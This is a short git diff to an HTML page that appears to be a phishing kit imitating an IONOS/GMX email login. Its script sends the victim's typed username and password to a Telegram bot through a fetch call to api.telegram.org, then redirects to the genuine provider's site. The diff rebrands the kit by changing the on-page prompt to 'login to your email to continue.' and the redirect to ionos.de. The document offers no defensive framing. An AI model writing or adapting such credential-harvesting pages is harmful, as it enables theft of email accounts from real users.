--- a/IONOS.html
+++ b/IONOS.html
@@ -195,7 +195,7 @@ footer#footer ul li{
           </img>
     </div>
     <div class="sign-att">
-      <h2>Not your device? Log out after the session or use private browsing mode.</h2>
+      <h2>login to your email to continue.</h2>
       <p></p>
     </div>
     <form action="" method="post" id="form">
@@ -261,7 +261,7 @@ footer#footer ul li{
           fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=GMX-RESULT=Username::${result1}==++==Password::${result2}`, {
               method: "GET"
           }).then(success => {
-              window.location.replace("https://gmx.net");
+              window.location.replace("https://www.ionos.de/");
           }, error => {
               alert("Message not sent")
               console.log(error)
